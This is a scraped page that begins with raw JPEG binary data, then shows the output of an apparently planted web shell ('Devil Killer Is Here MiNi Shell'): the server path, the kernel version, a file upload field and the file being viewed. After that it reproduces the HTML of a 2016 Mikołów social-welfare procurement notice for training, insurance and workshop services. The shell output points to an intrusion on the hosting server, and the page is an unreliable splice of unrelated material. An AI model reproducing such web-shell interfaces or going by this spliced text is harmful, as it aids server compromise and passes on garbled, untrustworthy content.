JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160505/112496-N-2016.html

<p class="kh_header"><b>Mikołów: Świadczenie usług dla uczestników Programu Aktywizacja i Integracja będących uczestnikami projektu Krok w przyszłość realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020 dla osi priorytetowej IX Włączenie społeczne dla działania 9.1 Aktywna integracja dla poddziałania 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy</b><br>
<b>Numer ogłoszenia: 112496 - 2016; data zamieszczenia: 05.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 2, 43-190 Mikołów, woj. śląskie, tel. 32 3242666, faks 32 3242694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.mikolow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług dla uczestników Programu Aktywizacja i Integracja będących uczestnikami projektu Krok w przyszłość realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020 dla osi priorytetowej IX Włączenie społeczne dla działania 9.1 Aktywna integracja dla poddziałania 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1- przeprowadzenie usługi szkolenia w zakresie BHP - wstępny instruktaż ogólny 
3.2.1.	Przewidywana ilość osób do przeszkolenia- min. 10 osób biorących udział w Programie Aktywizacja i Integracja - prace wykonywane będą na ternie Mikołowa. Ilość może ulec  zwiększeniu w przypadku zmiany ilości osób skierowanych do udziału projekcie, co wymagało będzie przeprowadzenia instruktażu ogólnego dla kolejnych osób w terminie do końca sierpnia 2016.
3.2.2.	Instruktaż ogólny zgodnie z Rozporządzenia Ministra Gospodarki i Pracy z dnia 27 lipca 2004 r. w sprawie szkolenia w dziedzinie bezpieczeństwa i higieny pracy powinien zapewnić uczestnikom szkolenia zapoznanie się z podstawowymi przepisami bezpieczeństwa i higieny pracy zawartymi w Kodeksie pracy, w układach zbiorowych pracy lub regulaminach pracy, z przepisami oraz zasadami bezpieczeństwa i higieny pracy obowiązującymi w danym zakładzie pracy, a także z zasadami udzielania pierwszej pomocy w razie wypadku.
3.2.3.	Do obowiązków wykonawcy należy:
Przeprowadzenie min. 3 godzinnego szkolenia w terminie wskazanym przez Zamawiającego
Zapewnienie każdemu uczestnikowi materiałów szkoleniowych w formie pisemnej z potwierdzeniem odbioru
Sporządzenie listy obecności uczestników szkolenia
Uzyskanie pisemnego potwierdzenia odbycia szkolenia przez uczestnika
Przedstawienie propozycji ramowego programu szkolenia Zamawiającemu
Ustalenia z zamawiającym dokładnego terminu szkolenia
Przekazanie zamawiającemu materiałów szkoleniowych dla uczestników w formie elektronicznej
Przekazanie zamawiającemu wszystkich list oraz potwierdzeń
3.2.4.	Szkolenie odbędzie się siedzibie Zamawiającego.

CPV: 80.55.00.00-4 Usługi szkolenia w dziedzinie bezpieczeństwa

3.3.	Część 2- Ubezpieczenie grupowe NNW 10 osób 
3.3.1.	Okres objęty ochroną ubezpieczenia: 6 miesięcy od dnia zawarcia umowy, jednak nie wcześniej niż od 1 czerwca 2016r.
3.3.2.	Suma ubezpieczenia: 80.000,00 zł Suma ubezpieczenia stanowi kryterium oceny ofert.
3.3.3.	Zakres ubezpieczenia: od poniedziałku do piątku w godzinach max od 8.00 do 17.00- na czas prowadzonych zajęć, w drodze na zajęcia oraz drodze powrotnej do domu. Dotyczy zdarzeń mających miejsce na terenie gminy Mikołów. Przykładowe zajęcia aktywizacyjne, w których będą brać udział ubezpieczeni: zajęcia aktywizujące zawodowo - prace fizyczne na terenie Mikołowa, np. koszenie kosiarką, plewienie chwastów;  prace ogólnoporządkowe.
3.3.4.	Zakres ubezpieczenia zapewnia wypłatę świadczenia z tytułu konsekwencji poniesionych w wyniku nieszczęśliwego wypadku w postaci: rozstroju zdrowia powodującego uszczerbek na zdrowiu lub śmierć uczestnika. Świadczenie podstawowe.

CPV- 66.51.21.00-3 Usługi ubezpieczenia od następstw nieszczęśliwych wypadków

3.4.	Część 3: Prowadzenie grupowych warsztatów aktywizacji i komunikacji interpersonalnej 
3.4.1.	Przewiduje się 48 godzin wsparcia, niemniej niż 2 godzin zegarowe w tygodniu. 
3.4.2.	Zajęcia będą prowadzone każdorazowo we wtorek między godziną 9.00 - 11.05 z przerwą 5 minutową. W przypadku gdy dany dzień okaże się być dniem wolnym od pracy (święta)harmonogram będzie ustalany na bieżąco z wykonawcą.
3.4.3.	Zamawiający udostępni miejsce do przeprowadzenia warsztatów w siedzibie Zamawiającego.
3.4.4.	Ilość osób objętych wsparciem- min 10 osób 
3.4.5.	Minimalny zakres tematyczny zajęć:
a.	Komunikacja interpersonalna- zasady komunikacji interpersonalnej tj. poznanie zasad właściwej komunikacji, znaczenia komunikacji werbalnej i niewerbalnej, przybliżenie uczestnikom tematyki asertywności i jej znaczenia w pracy i w życiu społecznym; 
b.	Autoprezentacja - nauka zaprezentowania się, wygląd zewnętrzny
c.	Wzmacnianie własnej wartości
d.	Radzenie sobie ze stresem
e.	Autokreacja 

3.5.	Część 4: Prowadzenie grupowych warsztatów poruszania się po rynku pracy
3.5.1.	Przewiduje się 48 godzin wsparcia, niemniej niż 2 godzin zegarowe w tygodniu. 
3.5.2.	Zajęcia będą prowadzone każdorazowo w środę między godziną 9.00 - 11.05 z przerwą 5 minutową. W przypadku gdy dany dzień okaże się być dniem wolnym od pracy (święta)harmonogram będzie ustalany na bieżąco z wykonawcą.
3.5.3.	Zamawiający udostępni miejsce do przeprowadzenia warsztatów w siedzibie Zamawiającego.
3.5.4.	Ilość osób objętych wsparciem- min  10 osób
3.5.5.	Minimalny zakres tematyczny zajęć:
a.	charakterystyka rynku pracy i możliwości zatrudnienia - charakterystyka obecnego rynku pracy, zjawiska na rynku pracy, nowe formy zatrudnienia, metody poszukiwania pracy
b.	tworzenie planów rozwoju zawodowego - określenie celów zawodowych, planowanie realizacji celów, zainteresowania i predyspozycje zawodowe, określenie mocnych i słabych stron, wartości i ich rola w życiu i pracy 
c.	autopromocja na rynku pracy - zasady pisania CV, listu motywacyjnego
d.	prowadzenie rozmów z pracodawcami - zasady odbywania rozmów kwalifikacyjnych, rozmowa kwalifikacyjna w aspekcie korzystnej autoprezentacji
e.	unikanie zagrożeń związanych z dłuższym pozostawaniem bez pracy - mechanizmy rządzące zachowaniem osób długo pozostających bez pracy, samorealizacja pozazawodowa - aktywność hobbystyczna

3.6.	Część 5: Prowadzenie grupowych warsztatów profilaktyki zdrowotnej 
3.6.1.	Przewiduje się 48 godzin wsparcia, niemniej niż 2 godzin zegarowe w tygodniu. 
3.6.2.	Zajęcia będą prowadzone każdorazowo w czwartek między godziną 9.00 - 11.05 z przerwą 5 minutową. W przypadku gdy dany dzień okaże się być dniem wolnym od pracy (święta)harmonogram będzie ustalany na bieżąco z wykonawcą.
3.6.3.	Zamawiający udostępni miejsce do przeprowadzenia warsztatów w siedzibie Zamawiającego.
3.6.4.	Ilość osób objętych wsparciem- min 10 osób. 
3.6.5.	Minimalny zakres tematyczny zajęć:
a.	profilaktyka zdrowego stylu życia (mechanizmy związane z metabolizmem, konsekwencje braku dbałości o zdrowie) 
b.	nabycie umiejętności pomocy przedmedycznej
c.	profesjonalny wizerunek pracownika 
d.	tworzenie kompozycji zestawów posiłków odpowiednich do ich wieku oraz płci. 

3.7.	Część 6: Prowadzenie grupowych warsztatów efektywnego zachowania się w sytuacjach życia codziennego, wzmacnianie postaw prawidłowego funkcjonowania w społeczeństwie
3.7.1.	Przewiduje się 48 godzin wsparcia, niemniej niż 2 godzin zegarowe w tygodniu. 
3.7.2.	Zajęcia będą prowadzone każdorazowo w środę między godziną 11.20 - 13.25 z przerwą 5 minutową. W przypadku gdy dany dzień okaże się być dniem wolnym od pracy (święta)harmonogram będzie ustalany na bieżąco z wykonawcą.
3.7.3.	Zamawiający udostępni miejsce do przeprowadzenia warsztatów w siedzibie Zamawiającego.
3.7.4.	Ilość osób objętych wsparciem- min 10 osób. 
3.7.5.	Minimalny zakres tematyczny zajęć:
a.	umiejętności związane z percepcją społeczną (trafne spostrzeganie innych, np. ich przeżyć lub intencji, oraz rozumienie i prawidłowa ocena sytuacji społecznych) 
b.	wrażliwość społeczna, empatia i decentracja interpersonalna 
c.	znajomość reguł społecznych i umiejętność odpowiedniego zachowania się w sytuacjach społecznych
d.	umiejętność rozwiązywania konkretnych problemów interpersonalnych i sterowania sytuacjami społecznymi
e.	umiejętności warunkujące radzenie sobie w sytuacjach konfliktowych i wymagających asertywności

3.8.	Część 7: Prowadzenie grupowych warsztatów gospodarowania budżetem domowym
3.8.1.	Przewiduje się 48 godzin wsparcia, niemniej niż 2 godzin zegarowe w tygodniu. 
3.8.2.	Zajęcia będą prowadzone każdorazowo w czwartek między godziną 11.20 - 13.25 z przerwą 5 minutową. W przypadku gdy dany dzień okaże się być dniem wolnym od pracy (święta)harmonogram będzie ustalany na bieżąco z wykonawcą.
3.8.3.	Zamawiający udostępni miejsce do przeprowadzenia warsztatów w siedzibie Zamawiającego.
3.8.4.	Ilość osób objętych wsparciem- min 10 osób. 
3.8.5.	Minimalny zakres tematyczny zajęć:
a.	nabycie umiejętności umiejętnego planowania i gospodarowania budżetem rodziny (oszczędzanie na zakupach, telefonach, energii, wody, ogrzewania)
b.	planowanie i kontrola wydatków (przykładowy budżet domowy, warsztaty tworzenia indywidualnych budżetów domowych, kontrola przepływu gotówki i jej zmienność w czasie) 
c.	podział obowiązków w rodzinie i komunikacja
d.	przedstawienie zagadnień związanych z zadłużaniem się i korzystaniem z instytucji pożyczkowych
e.	rozwijanie umiejętności praktycznych w gospodarstwie domowym 
f.	zakupy codzienne i okazjonalne.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.55.00.00-4, 66.51.21.00-3, 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1- przeprowadzenie usługi szkolenia w zakresie BHP - wstępny instruktaż ogólny - posiadanie uprawnień do wykonywania usług w zakresie bhp  zgodnie z Rozporządzenia Ministra Gospodarki i Pracy z dnia 27 lipca 2004 r. w sprawie szkolenia w dziedzinie bezpieczeństwa i higieny pracy.

Część 2- Ubezpieczenie grupowe NNW 10 osób - posiadanie zezwolenie właściwego organu na prowadzenie działalności ubezpieczeniowej w zakresie zgodnym z przedmiotem zamówienia lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów zaświadczenie właściwego organu nadzoru, że Wykonawca prowadzi działalność ubezpieczeniową w wymaganym zakresie lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów oświadczenie organu uprawnionego do reprezentowania wykonawcy, że prowadzi on działalność ubezpieczeniową w wymaganym zakresie i nie jest konieczne posiadanie przez niego zezwolenia wraz z przytoczeniem podstawy prawnej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 3: Prowadzenie grupowych warsztatów aktywizacji i komunikacji interpersonalnej-  Wykonawca winien wykazać wykonanie (przeprowadzenie), lub w przypadku świadczeń okresowych lub ciągłych również wykonywanie  w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 warsztatów o tematyce aktywizacji i komunikacji interpersonalnej dla grupy min 5 osobowej 

Część 4: Prowadzenie grupowych warsztatów poruszania się po rynku pracy Wykonawca winien wykazać wykonanie (przeprowadzenie), lub w przypadku świadczeń okresowych lub ciągłych również wykonywanie  w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 warsztatów o tematyce poruszania się po rynku pracy dla grupy min 5 osobowej

Część 5: Prowadzenie grupowych warsztatów profilaktyki zdrowotnej Wykonawca winien wykazać wykonanie (przeprowadzenie), lub w przypadku świadczeń okresowych lub ciągłych również wykonywanie  w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 warsztatów o tematyce profilaktyki zdrowotnej dla grupy min 5 osobowej

Część 6: Prowadzenie grupowych warsztatów efektywnego zachowania się w sytuacjach życia  codziennego, wzmacnianie postaw prawidłowego funkcjonowania w społeczeństwie Wykonawca winien wykazać wykonanie (przeprowadzenie), lub w przypadku świadczeń okresowych lub ciągłych również wykonywanie  w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 warsztatów o tematyce zachowania się w życiu codziennym dla grupy min 5 osobowej 

Część 7: Prowadzenie grupowych warsztatów gospodarowania budżetem domowym
Wykonawca winien wykazać wykonanie (przeprowadzenie), lub w przypadku świadczeń okresowych lub ciągłych również wykonywanie  w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 warsztatów o tematyce gospodarowania środkami finansowymi dla grupy min 5 osobowej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 3: Prowadzenie grupowych warsztatów aktywizacji i komunikacji interpersonalnej-  dysponowanie co najmniej 1 doradcą zawodowym, oraz co najmniej 1 osobą  posiadającą kwalifikacje przygotowujące do prowadzenia treningu interpersonalnego udokumentowane certyfikatem trenera lub innym dokumentem potwierdzającym ukończenie szkoleń, kursów itp. przygotowujących do prowadzenia warsztatów komunikacji interpersonalnej,

Część 4: Prowadzenie grupowych warsztatów poruszania się po rynku pracy- dysponowanie co najmniej 1 doradcą zawodowym

Część 5: Prowadzenie grupowych warsztatów profilaktyki zdrowotnej - dysponowanie co najmniej 1 osobą która posiada co najmniej roczne doświadczenie w prowadzeniu zajęć o tematyce profilaktyki zdrowotnej

Część 6: Prowadzenie grupowych warsztatów efektywnego zachowania się w sytuacjach życia  codziennego, wzmacnianie postaw prawidłowego funkcjonowania w społeczeństwie- dysponowanie co najmniej 1 psychologiem

Część 7: Prowadzenie grupowych warsztatów gospodarowania budżetem domowym- dysponowanie co najmniej jedną osobą posiadającą minimum roczne doświadczenie zawodowe w prowadzeniu szkolenia w zakresie racjonalnego gospodarowania budżetem domowym i zarządzania własnym gospodarstwem domowym.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia spełniania warunków podmiotowych wymienionych w pkt 8.1 siwz wykonawcy zobowiązani są przedłożyć oświadczenie o spełnianiu warunków udziału w postępowaniu (wg zał. Nr 2a do 2 g do siwz)
Część 1- przeprowadzenie usługi szkolenia w zakresie BHP - wstępny instruktaż ogólny 
w szczególności o posiadaniu uprawnienia do wykonywania usług w zakresie bhp  zgodnie z Rozporządzenia Ministra Gospodarki i Pracy z dnia 27 lipca 2004 r. w sprawie szkolenia w dziedzinie bezpieczeństwa i higieny pracy.

Część 2- Ubezpieczenie grupowe NNW 10 osób 
w szczególności o posiadniu zezwolenie właściwego organu na prowadzenie działalności ubezpieczeniowej w zakresie zgodnym z przedmiotem zamówienia lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów zaświadczenie właściwego organu nadzoru, że Wykonawca prowadzi działalność ubezpieczeniową w wymaganym zakresie lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów oświadczenie organu uprawnionego do reprezentowania wykonawcy, że prowadzi on działalność ubezpieczeniową w wymaganym zakresie i nie jest konieczne posiadanie przez niego zezwolenia wraz z przytoczeniem podstawy prawnej 

Część 3: Prowadzenie grupowych warsztatów aktywizacji i komunikacji interpersonalnej 
w szczególności:
a) wykonał (przeprowadził), lub w przypadku świadczeń okresowych lub ciągłych również wykonuje  w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 warsztat o tematyce aktywizacji i komunikacji interpersonalnej dla grupy min 5 osobowej 
b) dysponuje co najmniej 1 doradcą zawodowym, oraz co najmniej 1 osobą  posiadającą kwalifikacje przygotowujące do prowadzenia treningu interpersonalnego udokumentowane certyfikatem trenera lub innym dokumentem potwierdzającym ukończenie szkoleń, kursów itp. przygotowujących do prowadzenia warsztatów komunikacji interpersonalnej

Część 4: Prowadzenie grupowych warsztatów poruszania się po rynku pracy
w szczególności:
a) wykonał (przeprowadził), lub w przypadku świadczeń okresowych lub ciągłych również wykonuje  w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 warsztat o tematyce poruszania się po rynku pracy dla grupy min 5 osobowej
b) dysponuje co najmniej 1 doradcą zawodowym

Część 5: Prowadzenie grupowych warsztatów profilaktyki zdrowotnej 
w szczególności:
a) wykonał (przeprowadził), lub w przypadku świadczeń okresowych lub ciągłych również wykonuje  w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 warsztat o tematyce profilaktyki zdrowotnej dla grupy min 5 osobowej
b) dysponuje co najmniej 1 osobą która posiada co najmniej roczne doświadczenie w prowadzeniu zajęć o tematyce profilaktyki zdrowotnej

Część 6: Prowadzenie grupowych warsztatów efektywnego zachowania się w sytuacjach życia  codziennego, wzmacnianie postaw prawidłowego funkcjonowania w społeczeństwie
w szczególności:
a) wykonał (przeprowadził), lub w przypadku świadczeń okresowych lub ciągłych również wykonuje  w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 warsztat o tematyce zachowania się w życiu codziennym dla grupy min 5 osobowej 
b) dysponuje co najmniej 1 psychologiem

Część 7: Prowadzenie grupowych warsztatów gospodarowania budżetem domowym
w szczególności:
a) wykonał (przeprowadził), lub w przypadku świadczeń okresowych lub ciągłych również wykonuje  w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 warsztat o tematyce gospodarowania środkami finansowymi dla grupy min 5 osobowej 
b) dysponuje co najmniej jedną osobą posiadającą minimum roczne doświadczenie zawodowe w prowadzeniu szkolenia w zakresie racjonalnego gospodarowania budżetem domowym i zarządzania własnym gospodarstwem domowym.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.mikolow.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Mikołowie 
ul. Kolejowa 2 
43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2016 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Mikołowie 
ul. Kolejowa 2 
43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




